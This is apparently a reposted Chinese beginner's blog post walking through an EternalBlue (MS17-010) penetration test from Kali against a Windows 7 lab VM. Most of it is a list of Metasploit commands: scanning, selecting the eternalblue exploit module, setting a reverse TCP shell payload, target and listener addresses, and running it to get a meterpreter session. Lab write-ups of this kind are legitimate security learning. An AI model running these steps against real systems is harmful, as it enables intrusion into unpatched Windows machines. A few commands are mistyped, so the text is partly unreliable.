EternalBlue永恒之蓝渗透测试

Eternal Blue(永恒之蓝)-ms17-010渗透测试

第一次做的渗透测试,也是第一次去写博客,还望各位师傅多多指正 :)

工具
1.靶机系统 window7 开放445以及139端口
2.kali-Linux虚拟机
注意要保证靶机与主机IP位于同一网段(可用ping命令进行检测)

0x01 更新metasploit

在kali终端输入msfconsole
然后输入apt-get install metaspolit-framework(要在root权限下,若不在,记得在命令前加入sudo,记得输入密码)

0x02查找漏洞

输入search ms17-010,接着就可以看到五行可用命令
应该是两行use auxiliary,三行use exploit命令

0x03进行扫描

执行命令:use auxiliary/scanner/smb/smb_ms17_010

0x04选择排行等级较高的攻击模块

执行命令:use exploit/windows/smb/ms17_010_eternalblue
【show payloads(设置攻击载荷)选择默认的即可,
一般为set payload generic/shell_reverse_tcp】
下一步 show options(查看模块所需配置参数)
set rhosts (设置靶机IP)
set lhosts (设置主机IP)
set lport 4444(监听端口)

0x05最后一步,渗透开始

命令:exploit
或者 run 也可以
成功后,会出现meterpreter

补充 445端口

自己动手,丰衣足食

猜你喜欢

转载自blog.csdn.net/weixin_52517939/article/details/114293219